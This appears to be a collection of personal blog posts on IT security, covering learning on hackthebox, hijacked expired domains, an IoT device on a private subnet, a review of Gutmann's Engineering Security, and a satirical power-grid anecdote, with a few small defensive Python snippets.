Hacking

I am joining the ranks of self-proclaimed productivity experts: Do you feel distracted by social media? Do you feel that too much scrolling through feeds transforms your mind – in a bad way? Solution: go find an online platform that will put your mind in a different state. Go hacking on hackthebox.eu.

I have been hacking boxes over there for quite a while – and obsessively. I really wonder why I did not try to attack something much earlier. It’s funny as I have been into IT security for a long time – ‘infosec’ as it seems to be called now – but I was always a member of the Blue Team, a defender: Hardening Windows servers, building Public Key Infrastructures, always learning about attack vectors … but never really testing them extensively myself.

Earlier this year I was investigating the security of some things. They were black boxes to me, and I figured I finally needed to learn about some offensive tools – so I set up a Kali Linux machine. Then I searched for the best way to learn about these tools: I read articles and books about pentesting. But I had no idea if these ‘things’ were vulnerable at all, and where to start. So I figured: Maybe it is better to attack something made vulnerable intentionally? There are vulnerable web applications, and you can download vulnerable virtual machines … but then I remembered I had seen posts about hackthebox some months ago:

As an individual, you can complete a simple challenge to prove your skills and then create an account, allowing you to connect to our private network (HTB Labs) where several machines await for you to hack them.

Back then I had figured I would not pass this entry challenge, nor hack any of these machines. It turned out otherwise, and it has been a very interesting experience so far – to learn about pentesting tools and methods on-the-fly. It has all been new, yet familiar in some sense.

I was once a so-called expert for certain technologies or products. But very often I became that expert by effectively reverse engineering the product a few days before I showed off that expertise. I had the exact same mindset and methods that are needed to attack the vulnerable applications of these boxes. I believe that in today’s world of interconnected systems, rapid technological change, [more buzz words here], every ‘subject matter expert’ is often actually reverse engineering – rather than applying knowledge acquired by proper training. I had certifications, too – but typically I never attended a course; I just took the exam after I had learned on the job.

On a few boxes I could use in-depth knowledge about protocols and technologies I had long-term experience with, especially Active Directory and Kerberos. However, I did not find those boxes easier to own than, e.g., the Linux boxes where everything was new to me. With Windows boxes I focussed too much on things I knew, and overlooked the obvious. On Linux I was just a humble learner – and it seemed this made me find the vulnerability or misconfiguration faster.

I felt like time-travelling back to when I started ‘in IT’, back in the late 1990s. Now I can hardly believe that I went directly from staff scientist in a national research center to down-to-earth freelance IT consultant – supporting small businesses. With hindsight, I knew so little both about business and about how IT / Windows / computers are actually used in the real world. I tried out things, I reverse engineered, I was humbled by what remained to be learned. But on the other hand, I was delighted by how many real-life problems – for whose solution people were eager to pay – can be solved pragmatically by knowing only 80%. Writing academic papers had felt more like aiming at 130% all of the time – but first you have to beg governmental entities to pay for it. Some academic colleagues were upset by my transition to the dark side, but I never saw this chasm: Experimental physics was about reverse engineering natural black boxes – and sometimes about reverse engineering your predecessor’s enigmatic code. IT troubleshooting was about reverse engineering software. Theoretically it is all about logic and just zeros and ones, and you should be able to track down the developer who can explain that weird behavior. But in practice, as a freshly minted consultant without any ‘network’ you can hardly track down that developer in Redmond – so you make educated guesses and poke around the system.

I also noted eerie coincidences: In the months before being sucked into hackthebox’s black hole, I had been catching up on Python, C/C++, and Powershell – for productive purposes, for building something. But all of that is very useful now, for using or modifying exploits. In addition, I realize that my typical console applications for simulations and data analysis are quite similar ‘in spirit’ to typical exploitation tools. Last year I also learned about design patterns and best practices in object-oriented software development – and I was about to overdo it. Maybe it’s good to throw in some Cowboy Coding for good measure!

But above all, hacking boxes is simply addictive in a way that cannot be fully explained. It is like reading novels about mysteries and secret passages. Maybe this is what computer games are to some people. Some commentators say that machines on pentesting platforms are more Capture-the-Flag-like (CTF) than real-world pentesting targets. It is true that some challenges have a ‘story line’ that takes you from one solved puzzle to the next one. To some extent a part of the challenge has to be fabricated, as there are no real users to social engineer. But there are very real-world machines on hackthebox, e.g. requiring you to escalate from one object in a Windows domain to another.

And if you ever have seen what stuff is stored in clear text in the real world, or what passwords might be used ‘just for testing’ (and never changed) – then also the artificial guess-the-password challenges do not appear that unrealistic. I want to emphasize that I am not the one to make fun of weak test passwords and the like at all. More often than not I was the one whose job was to get something working / working again, under pressure. Sometimes it is not exactly easy to ‘get it working’ quickly, in an emergency, and at the same time considering all security implications of the ‘fix’ you have just applied – by thinking like an attacker. hackthebox is an excellent platform to learn that, so I cannot recommend it enough!

An article about hacking is not complete if it lacks a clichéd stock photo! I am searching for proper hacker’s attire now – this was my first find!

Infinite Loop: Theory and Practice Revisited.

I’ve unlocked a new achievement as a blogger, or a new milestone as a life-form. As a dinosaur telling the same old stories over and over again.

I started drafting a blog post, as I have done for a while now: I do it in my mind only, twisting and turning it for days or weeks – until I am ready to write it down in one go. Today I wanted to release a post called On Learning (2) or the like. I knew I had written an early post with a similar title, so I expected this to be a loosely related update. But then I checked the old On Learning post: I found not only the same general ideas but the same autobiographical anecdotes I wanted to use now – even in the same order.

In 2014 I had looked back on being both a teacher and a student for the greater part of my professional life, and the patterns were always the same – be the field physics, engineering, or IT security. I had written this post after a major update of our software for analyzing measurement data. This update had required me to acquire new skills, which was a delightful learning experience. I tried to reconcile very different learning modes: ‘Book learning’ about so-called theory, including learning for the joy of learning, and solving problems hands-on based on the minimum knowledge absolutely required.

It seems I like to talk about The Joys of Theory a lot – I have meta-posted about theoretical physics in general (more than once), about general relativity as an example, and about computer science. I searched for posts about hands-on learning now – there aren’t any. But every post about my own research and work chronicles this hands-on learning in a non-meta, explicit way. These are the posts listed on the heat pump / engineering page, the IT security / control page, and some of the physics posts about the calculations I used in my own simulations.

Now that I am wallowing in nostalgia and scrolling through my old posts, I feel there is one possibly new insight: Whenever I used knowledge to achieve a result that I really needed to get some job done, I think of this knowledge as emerging from hands-on tinkering and from self-study. I once read that many seasoned software developers said the same in a survey about their background: They checked ‘self-taught’ despite having university degrees or professional training.

This holds for the things I had learned theoretically – be it in a class room or via my morning routine of reading textbooks. I learned about differential equations, thermodynamics, numerical methods, heat pumps, and about object-oriented software development. Yet when I actually have to do all that, it is always like re-learning it in a more pragmatic way – even if the ‘class’ was very ‘applied’, not much time had passed since learning, and I had taken exams. This is even true for the archetype of all self-studied disciplines – hacking. Doing it – like here, white-hat-style ;-) – is always a self-learning exercise, and reading about pentesting and security happens in an alternate universe.

The difference between these learning modes is maybe not only in ‘the applied’ versus ‘the theoretical’ – it is your personal stake in the outcome that matters: Skin In The Game. A project done by a group of students for the final purpose of passing a grade is not equivalent to running this project for your client or for yourself. The point is not whether the student project is done for a real-life client, or whether the task as such makes sense in the real world. The difference is whether it feels like an exercise in a gamified system, or whether the result will matter financially / ‘existentially’ – as you might try to impress your future client or employer, or use the project results to build your own business. The major difference is in weighing risks and rewards, efforts and long-term consequences. Even ‘applied hacking’ in Capture-the-Flag-like contests is different from real-life pentesting. It makes all the difference if you just lose ‘points’ and miss the ‘flag’, or if you inadvertently take down a production system and violate your contract.

So I wonder if the Joy of Theoretical Learning is to some extent due to its risk-free nature. As long as you just learn about all those super interesting things because you want to know – it is innocent play. Only when you finally touch something in the real world – and touching things has hard consequences – do you know whether you are truly ‘interested enough’.

Sorry, but I told you I will post stream-of-consciousness-style now and then :-)

I think it is OK to re-use the image of my beloved pre-1900 physics book I used in the 2014 post:

The Orphaned Internet Domain Risk

I have clicked on company websites of social media acquaintances, and something is not right: Slight errors in formatting, encoding errors for special German characters.

Then I notice that some of the pages contain links to other websites that advertise products in a spammy way. However, the links to the spammy sites are embedded in these alleged company websites in a subtle way: using the (nearly) correct layout, or embedding the link in a ‘news article’ that also contains legit product information – content really related to the internet domain I am visiting.

Looking up whois information tells me that these internet domains are not owned by my friends anymore – consistent with what they actually say on their social media profiles. So how come they ‘have given’ their former domains to spammers? They did not, and they didn’t need to: Spammers simply need to watch out for expired domains, seize them when they become available – and then reconstruct the former legit content from public archives and interleave it with their spammy messages.
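Spotting a lapsed domain is mostly a matter of reading its whois record. As a rough illustration – not the tooling I used; the field name and date format are assumptions, since registries format records differently – such a check could look like:

```python
from datetime import datetime, timezone

def domain_lapsed(whois_text: str, now: datetime) -> bool:
    """Return True if the whois record's expiry date lies in the past.

    Assumes the common 'Registry Expiry Date: 2018-03-01T12:00:00Z'
    line format used by many registries; real records vary.
    """
    for line in whois_text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "registry expiry date":
            expiry = datetime.strptime(value.strip(), "%Y-%m-%dT%H:%M:%SZ")
            return expiry.replace(tzinfo=timezone.utc) < now
    raise ValueError("no expiry date found in whois record")

record = "Domain Name: EXAMPLE.COM\nRegistry Expiry Date: 2018-03-01T12:00:00Z\n"
print(domain_lapsed(record, datetime(2019, 1, 1, tzinfo=timezone.utc)))  # lapsed
```

A spammer just runs something like this against lists of domains – the hard part is reconstructing the old content, and the web archive hands them that for free.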

The former content of legitimate sites is often available on the web archive. Here is the timeline of one of the sites I checked:

Clicking on the details shows:

  • Last display of legit content in 2008.
  • In 2012 and 2013 a generic message from the hosting provider was displayed: This site has been registered by one of our clients
  • After that we see mainly 403 Forbidden errors – so the spammers don’t want their site to be archived – but at one time a screen capture of the spammy site had been taken.

The new site shows the name of the former owner at the bottom, but an unobtrusive link has been added, indicating the new owner – a US-based marketing and SEO consultancy.

So my takeaway is: If you ever feel like decluttering your websites and freeing yourself of your useless digital possessions – and possibly also social media accounts – think twice: As soon as your domain or name is available, somebody might take it, and re-use and exploit your former content and possibly your former reputation for promoting their spammy stuff in a shady way.

This happened a while ago, but I know now it can get much worse: Why only distribute marketing spam if you can distribute malware through channels still considered trusted? In this blog post Malwarebytes raises the question whether such practices are illegal or not – it seems that question is not straightforward to answer.

Visitors do not even have to visit the abandoned domain explicitly to be served malware. I have seen some reports of abandoned embedded plug-ins turned into malicious zombies. Silly example: If you embed your latest tweets, Twitter goes out of business, and its domains are seized by spammers – your Follow Me icon might help to spread malware.

If a legit site runs third-party code, they need to trust the authors of this code. For example, Equifax’ website recently served spyware:

… the problem stemmed from a “third-party vendor that Equifax uses to collect website performance data,” and that “the vendor’s code running on an Equifax Web site was serving malicious content.”

So if you run any plug-ins, embedded widgets, or the like – better check regularly whether the originating domain is still run by the expected owner; monitor your vendors often, and don’t run code you do not absolutely need in the first place. Don’t use embedded active badges if a simple link to your profile would do.

Do a painful, boring inventory and assessment often – then you will notice how much work it is to manage these ‘partners’, and you will rather stay away from signing up and registering for too many services.
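Even a crude script can help with such an inventory. A minimal sketch – the host names below are made up, and real pages also pull in CSS, fonts, and dynamically injected scripts that a static parser will never see – that lists the third-party hosts a page references:

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class ThirdPartyScanner(HTMLParser):
    """Collect the hosts of external scripts, iframes, and images -
    a crude inventory of whom your pages pull code and content from."""

    def __init__(self, own_host: str):
        super().__init__()
        self.own_host = own_host
        self.third_party_hosts = set()

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "img"):
            src = dict(attrs).get("src", "")
            host = urlparse(src).netloc
            # Relative URLs have no netloc - those are your own content.
            if host and host != self.own_host:
                self.third_party_hosts.add(host)

scanner = ThirdPartyScanner("example.com")
scanner.feed('<script src="https://widgets.social-network.example/badge.js"></script>'
             '<img src="/local/logo.png">')
print(scanner.third_party_hosts)
```

Every host in that set is a ‘partner’ whose domain registration and ownership you now have to keep an eye on.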

Update 2017-10-25: And as we speak, we learn about another example – snatching a domain used for a Dell backup software, preinstalled on PCs.

Give the ‘Thing’ a Subnet of Its Own!

To my surprise, the most clicked post ever on this blog is this:

Network Sniffing for Everyone:
Getting to Know Your Things (As in Internet of Things)

… a step-by-step guide to sniff the network traffic of your ‘things’ contacting their mothership, plus a brief introduction to networking. I wanted to show how you can trace your networked devices’ traffic without any specialized equipment but being creative with what many users might already have, by turning a Windows PC into a router with Internet Connection Sharing.

Recently, an army of captured things took down part of the internet, and this reminded me of this post. No, this is not one more gloomy article about the Internet of Things. I just needed to use this Internet Sharing feature for the very purpose it was actually invented.

The Chief Engineer had finally set up the perfect test lab for programming and testing freely programmable UVR16x2 control systems (successor of UVR1611). But this test lab was located in a spot not equipped with wired ethernet, and the control unit’s data logger and ethernet gateway, the so-called CMI (Control and Monitoring Interface), only has a LAN interface and no WLAN.

So an ages-old test laptop was revived to serve as a router (improving its ecological footprint in passing): This notebook connects to the standard ‘office’ network via WLAN; this wireless connection is thus the internet connection that can be shared with a device connected to the notebook’s LAN interface, e.g. via a cross-over cable. As explained in detail in the older article, the router-laptop then allows for sniffing the traffic – but above all it allows the ‘thing’ to connect to the internet at all.

This is the setup:

Using a notebook with Internet Connection Sharing enabled as a router to connect CMI (UVR16x2's ethernet gateway) to the internet

The router laptop is automatically configured with IP address 192.168.137.1 and hands out addresses in the 192.168.137.x network as a DHCP server, while using an IP address provided by the internet router for its WLAN adapter (indicated here as commonly used 192.168.0.x addresses). If Windows 10 is used on the router-notebook, you might need to re-enable ICS after a reboot.
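The stdlib `ipaddress` module can make this addressing scheme explicit – a small sanity-check sketch (only the 192.168.137.0/24 network and the .1 router address are ICS defaults; the .50 and .23 addresses are made-up examples):

```python
import ipaddress

# Windows Internet Connection Sharing uses this subnet by default:
ics_net = ipaddress.ip_network("192.168.137.0/24")

router_lan_ip = ipaddress.ip_address("192.168.137.1")  # the ICS host itself
cmi_ip = ipaddress.ip_address("192.168.137.50")        # example DHCP lease for the CMI
office_pc = ipaddress.ip_address("192.168.0.23")       # example office-network address

# The router and the 'thing' share the private subnet ...
assert router_lan_ip in ics_net and cmi_ip in ics_net
# ... while office PCs sit outside it and cannot reach the CMI directly.
assert office_pc not in ics_net
```

That last assertion is the whole point of the setup: anything outside 192.168.137.0/24 has to take the ‘cloud’ route.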

The control unit is connected to the CMI via CAN bus – so the combination of test laptop, CMI, and UVR16x2 control unit is similar to the setup used for investigating CAN monitoring recently.

The CMI ‘thing’ is tucked away in a private subnet dedicated to it, and it cannot be accessed directly from any ‘Office PC’ – except the router PC itself. A standard office PC (green) effectively has to access the CMI via the same ‘cloud’ route as an Internet User (red). This makes the setup a realistic test for future remote support – when the CMI plus control unit has been shipped to its proud owner and is configured on the final local network.

The private subnet setup is also a simple workaround in case several things cannot get along well with each other: For example, an internet TV service flooded CMI’s predecessor BL-NET with packets that were hard to digest – so BL-NET refused to work without a further reboot. Putting the sensitive device in a private subnet – using a ‘spare part’ router – solved the problem.

The Chief Engineer's quiet test lab for testing and programming control units

What I Never Wanted to Know about Security but Found Extremely Entertaining to Read

This is in praise of Peter Gutmann‘s book draft Engineering Security, and the title is inspired by his talk Everything You Never Wanted to Know about PKI but were Forced to Find Out.

Chances are high that any non-geek reader is already intimidated by the acronym PKI – sharing the links above on LinkedIn I have been asked Oh. Wait. What the %&$%^ is PKI??

This reaction is spot-on, as this post is more about usability and perception of technology by end users – despite, or because of, the fact that I have worked for more than 10 years at the geeky end of Public Key Infrastructure. In summary, PKI is a bunch (actually a ton) of standards that should allow for creating the electronic counterparts of signatures, of issuing passports, of transferring data in locked cabinets. Basically, it should solve all security issues.

The following images from Peter Gutmann’s book might invoke some memories.

Security warnings designed by geeks look like this:

Peter Gutmann, Engineering Security, certificate warning - What the developers wrote

Peter Gutmann, Engineering Security, book draft, available at https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf, p.167. Also shown in Things that Make us Stupid, https://www.cs.auckland.ac.nz/~pgut001/pubs/stupid.pdf, p.3.

As a normal user, you might rather see this:

Peter Gutmann, Engineering Security, certificate warning - What the user sees

Peter Gutmann, Engineering Security, book draft, available at https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf, p.168.

The funny thing was that I picked this book to take a break from books on psychology and return to the geeky stuff – and then I was back to all kinds of psychological biases and Kahneman’s Prospect Theory for example.

What I appreciate in particular is the diverse range of systems and technologies considered – Apple, Android, UNIX, Microsoft, … – all evaluated agnostically, plus a diverse range of interdisciplinary research. Now that’s what I call true erudition with a modern touch. Above all, I enjoyed the conversational and irreverent tone – never before have I started reading a book for technical reasons and then been unable to put it down because it was so entertaining.

My personal summary – which resonates a lot with my experience – is:
In trying to make systems more secure, you might not only make them more unusable and obnoxious, but also more insecure.

A concise summary is also given in Gutmann’s talk Things that Make Us Stupid. I liked in particular the ignition key as a real-world example for a device that is smart and easy-to-use, and providing security as a by-product – very different from interfaces of ‘security software’.

Peter Gutmann is not at all siding with ‘experts’ who always chide end users for being lazy and dumb – writing passwords down and sticking the post-its on their screens – and who state that all we need is more training and user awareness. Normal users use systems to get their job done, and they apply risk management in an intuitive way: Should I waste time following an obnoxious policy, or should I try to pass that hurdle as quickly as possible to do what I am actually paid for?

Geeks are weird – that’s a quote from the lecture slides linked above. Since Peter Gutmann is an academic computer scientist and obviously a down-to-earth practitioner with ample hands-on experience – which would definitely qualify him as a Geek God – his critique is even more convincing. In the book he quotes psychological research which proves that geeks really do think differently (as per standardized testing of personality types). Geeks constitute a minority of people (7%) who tend to take decisions – such as Should I click that pop-up? – in a ‘rational’ manner, as the simple and mostly wrong theories on decision making have proposed. One example Gutmann uses is testing for basic understanding of logic, such as: Does ‘All X are Y’ imply ‘Some X are Y’? Across cultures the majority of people think that this is wrong.

Normal people – and I think also geeks when they don’t operate in geek mode, e.g. in the wild, not in their programmer’s cave – fall for many so-called fallacies and biases.

Our intuitive decision making engine runs on autopilot, and we get conditioned to click away EULAs, next-next-finish the dreaded install wizards, or click away pop-ups, including the warnings. As users we don’t generate testable hypotheses or calculate risks, but act unconsciously based on our experience of what has worked in the past – and usually the click-away-anything approach works just fine. You would need US Navy-style constant drilling in order to be alert enough not to fall for those fallacies – hardly the situation of anonymous end users using their home PCs to do online banking.

Security indicators like padlocks and browser address bar colors change with every version of popular browsers. Not even tech-savvy users are able to tell from those indicators whether they are ‘secure’ now. But here is what is extremely difficult: Users would need to watch out for the lack of an indicator – one that is barely visible even when it is there. And we are – owing to confirmation bias – extremely bad at spotting the negative, the lack of something. Gutmann calls this the Simon Says problem.

It is intriguing to see how biases about what ‘the others’ – the users or the attackers – would do enter technical designs. For example, it is often assumed that a client machine or user who has authenticated itself is more trustworthy – and servers are more vulnerable to a malformed packet sent after successful authentication. In the Stuxnet attack, digitally signed malware (signed with stolen keys) was used – ‘if it’s signed it has to be secure’.

To make things worse, users are even conditioned for ‘insecure’ behavior: When banks use all kinds of fancy domain names to market their latest products, lure their users into clicking on links to those fancy sites in e-mails, and have them log on with their banking user accounts via these sites, they train users to fall for phishing e-mails – despite the fact that the same e-mails half-heartedly warn about clicking arbitrary links in e-mails.

I believe that in relation to systems like PKI – which require you to run some intricate procedures only every few years (these are called ceremonies for a reason) – admins should also be considered ‘users’.

I have spent many hours discussing proposed security features like Passwords need to be impossible to remember and never written down with people whose job it is to audit, draft policies, and read articles all day on what Gutmann calls conference-paper attacks. These are not the people who have to run systems, deal with helpdesk calls or costs, or handle requests from VIP users – top-level managers who on the one hand are extremely paranoid about system administrators sniffing their e-mails, yet on the other hand need instant 24/7 support with recovery of encrypted e-mails. (This should be given a name, like the Top Managers’ Paranoia Paradox.)

As a disclaimer I’d like to add that I don’t underestimate cyber security threats, risk management, policies etc. It is probably the current media hype on governments spying on us that makes me advocate a contrarian view.

I could back this up with tons of stories, many of them too good to be made up (but unfortunately NDA-ed): Security geeks – the ‘designers’ and ‘policy authors’ – often underestimate the time and effort required to run their solutions on a daily basis. It is often the so-called trivial and simple things that go wrong, such as: The documentation of that intricate process to be run every X years cannot be found, or the only employee who really knew about the interdependencies is long gone, or allegedly simple logistics go wrong (Now we are locked in the secret room to run the key ceremony… BTW, did anybody think of having the media ready to install the operating system on that highly secure, isolated machine?).

A large European PKI setup failed (it made headlines) because the sacred key of a root certification authority had been destroyed – which is the expected behavior for so-called Hardware Security Modules when they are tampered with, or at least when their sensors say so – and there was no backup. The companies running the project and running operations blamed each other.

I am not quoting this to make fun of others – I have made enough blunders myself. The typical response to this often is: Projects or operations have been badly managed, and you just need to throw more people and money at them to run secure systems in a robust and reliable way. This might be true, but it simply does not reflect the budget, time constraints, and lack of human resources typical IT departments of corporations have to deal with.

There is often a very real, palpable risk of trading off business continuity and availability (that is: safety) for security.

Again, I don’t want to downplay risks associated with broken algorithms and the NSA reading our e-mail. But as Peter Gutmann points out, cryptography is the last thing an attacker would target (even if a conference-paper attack had shown it is broken) – the implementation of cryptography rather guides attackers along the lines of where not to attack. Just consider the spectacular recent ‘hack’ of a prestigious one-letter Twitter account, which actually involved blackmailing the user after the attacker had gained control over the user’s custom domain through social engineering – most likely of underpaid call-center agents who had to face the dilemma of meeting the numbers in terms of customer satisfaction versus following the security awareness training they might have had.

Needless to say, encryption, smart cards, PKI etc. would not have prevented that type of attack.

Peter Gutmann says about himself that he is throwing rocks at PKIs, and I believe you can illustrate a particularly big problem using a perfect real-life metaphor: To users, digital certificates are like passports or driver licenses – signed by a trusted agency.

Now consider the following: A user might commit a crime, and his driver license is seized. PKI’s equivalent of that seizure is to have the issuing agency regularly publish a blacklist, listing all the bad guys. Police officers on the road need to have access to that blacklist in order to check drivers’ legitimacy. What happens if a user isn’t blacklisted but the blacklist publishing service is not available? The standard makes this check optional (like many other things – the norm when an ancient standard is retrofitted with security features), but let’s assume the police app follows the recommendation of what it SHOULD do. If the list is unavailable, the user is considered an alleged criminal and has to exit the car.

You could also imagine something similar happening to train riders who have printed out an online ticket that cannot be validated (e.g. distinguished from forgery) by the conductor due to a failure in the train’s IT systems.

Any ’emergency’ / ‘incident’ related to digital certificates I was ever called upon to support was about falsely blocking users from doing what they need to do – because of missing, misconfigured, or (temporarily) unavailable certificate revocation lists (CRLs). The most important question in PKI planning is typically how to work around or prevent inaccessible CRLs. I am aware of how petty this problem may appear to readers – what’s the big deal in monitoring a web server? But have you ever noticed how many alerts (e.g. via SMS) a typical administrator gets – and how many of them are false alarms? When I ask what will happen if the PKI / CRL signing / the web server breaks on Dec. 24 at 11:30 (in a European country), I am typically told that we need to plan for at least some days until recovery. This means that revocation information on the blacklist will be stale, too, as CRLs can be cached for performance reasons.
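The staleness arithmetic behind that planning question is simple enough to sketch. This is only an illustration – a real verifier reads the nextUpdate field from the ASN.1-encoded CRL, and the dates and the grace-period idea below are my own example, not a standard feature:

```python
from datetime import datetime, timedelta

def crl_usable(next_update: datetime, now: datetime,
               grace: timedelta = timedelta(0)) -> bool:
    """A cached CRL may be relied upon until its nextUpdate time,
    plus an optional operational grace period - a common
    business-continuity tweak in revocation-checking policy."""
    return now <= next_update + grace

# CRL signed Dec 22, valid until Dec 25 noon - the signing server dies Dec 24:
next_update = datetime(2013, 12, 25, 12, 0)
assert crl_usable(next_update, datetime(2013, 12, 24, 11, 30))
# By Dec 27 every strictly checking relying party fails, locking users out ...
assert not crl_usable(next_update, datetime(2013, 12, 27, 0, 0))
# ... unless a grace period was planned into the checking policy:
assert crl_usable(next_update, datetime(2013, 12, 27, 0, 0), grace=timedelta(days=3))
```

The trade-off is plain in the code: every day of grace keeps users working through an outage – and honors a revoked certificate for that much longer.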

As you can imagine, most corporations rather tend to follow the reasonable approach of putting business continuity over security, so they want to make sure that a glitch in the web server hosting those blacklists will not stop 10.000 employees from accessing the wireless LAN, for example. Of course any weird standard can be worked around, given infinite resources. The point I wanted to make is that these standards were designed with something totally different in mind – by PKI Theologians in the 1980s.

Admittedly though, digital certificates and cryptography make for a great playground for geeks. I think I was a PKI theologian myself many years ago, until I rather morphed into what I – tongue-in-cheek – call an anti-security consultant: trying to help users (and admins) to keep on working despite new security features. I often advocated for not using certificates, proposing alternative approaches that boiled the potential PKI project down to a few hours of work – against the typical consultant’s mantra of trying to make yourself indispensable in long-term projects and of designing black boxes the client will never be able to operate on his own. Not only because of the PKI overhead, but because the alternatives were just as secure – just not as hyped.

So in summary, I am recommending Peter Gutmann’s terrific resources (check out his Crypto Tutorial, too!) to anybody who is torn between geek enthusiasm for some obscure technology and questioning its value nonetheless.

Rusty Padlock

No post on PKI, certificates, and keys would be complete without an image like this. I found the rusty one particularly apt here. (Wikimedia, user Garretttaggs)

Cyber Security Satire?

I am a science fiction fan. In particular, I am a fan of movies featuring Those Lonesome Nerds who are capable of controlling this planet’s critical infrastructure – from their gloomy basements.

But is it science fiction? In the year Die Hard 4.0 was released, a classified video surfaced – showing an electrical generator dying from a cyber attack. Fortunately, “Aurora” was just a test attack against a replica of a power plant.

Now some of you know that the Subversive El(k)ement calls herself a Dilettante Science Blogger on Twitter.

But there is an epic story to be unearthed here, and it would take a novelist to do it. I can imagine the long-winded narrative unfolding – of people who cannot use their showers or toilets any more after the blackout; of sinister hackers sending their evil commands into the control centers of that intricate blood circulation of our society we call The Power Grid. Of course they use smart meters to start their attack.

Unfortunately my feeble attempts at dipping my toes into novel writing were crushed before I even got started: this novel already exists – in German. I will inform you if it has been translated – either into a novel or directly into a Hollywood movie script.

As I am probably not capable of writing a serious thriller anyway, I would rather go for dark satire.

Douglas Adams covered so many technologies in The Hitchhiker’s Guide to the Galaxy – existing and imagined ones – but he did not elaborate much on intergalactic power transmission. So there is room for satire.

What if our Most Critical Infrastructure were attacked not by sinister hacker nerds but by our smart systems’ smartness – or rather, their dumbness? (Or their operators’?)

To all you silent readers and idea grabbers out there: don’t underestimate the cyber technology I have built into this mostly harmless wordpress.com blog: I know all of you who are reading this, and if you are going to exploit this idea without me I will time-travel back and forth and ruin your online reputation.

That being said, I’ll start crafting the plot:

As Adams probably drew his inspiration for the Vogons and InfiniDim Enterprises from encounters with corporations and bureaucracy, I will extrapolate my cyber security nightmare from an anecdote – one that actually happened!

Consider a programmer – a geek – trying to test his code. Sorry for the gender stereotype; as a geekess I am allowed to do this. It could be a female geek also!

The geek’s code should send messages to other computers in a Windows domain. “Domain” is a technical term here, not some geeky reference to the Dominion or the like. He is using net send. Info for Generation Y-ers and other tablet and smartphone freaks: this is like social media status message junk, lacking images.

But our geek protagonist makes a small mistake: he does not send the test command to his test computer only – but to “EUROPE”. This nearly refers to the whole continent: it actually addresses all computers in all European subsidiaries of a true Virtual Cyber Empire.

Fortunately modern IT networks are built on nearly-AI-powered devices called switches, which made the cyber attack peter out at the borders of That Large City.

How could we turn this into a story about an attack on the power grid, adding your typical ignorant non-tech sensationalist writer’s clichéd ideas?

  1. A humanoid life-form (or a flawed android testing his emotion chip) is tinkering with a sort of Hello World! command – sent to The Whole World, literally.
  2. The attack is just a glitch, an unfortunate concatenation of events, launched in an unrelated part of cyberspace – e.g. by a command displayed on a hacker’s screen in a Youtube video. Or it was launched from the gas grid.
  3. The Command of Death spreads pandemically over the continent, replicating itself more efficiently than cute cat videos on social networks.

I contacted my agent immediately.

Shattering my enthusiasm she told me:

This is not science-fiction – this is simply boring. Something like that happened recently in a small country in the middle of Europe.

According to this country’s news, a major power blackout had barely been avoided in May 2013. Engineers needed to control the delicate balance of power supply and demand manually, as the power grid’s control system had been flooded with gibberish – data that could not be interpreted.

The alleged originator of these commands was a gas transmission system operator in a neighboring country. This company was testing a new control system and tried to poll all of its meters for a status update. Somehow the command found its way from the gas grid to the European power grid and was replicated.

_________________________

Update – bonus material – making of: For the first time I felt the need to tell this story twice – in German and in English. This is not a translation, but rather two different versions in parallel universes. German-speaking readers: this is the German instance of the post.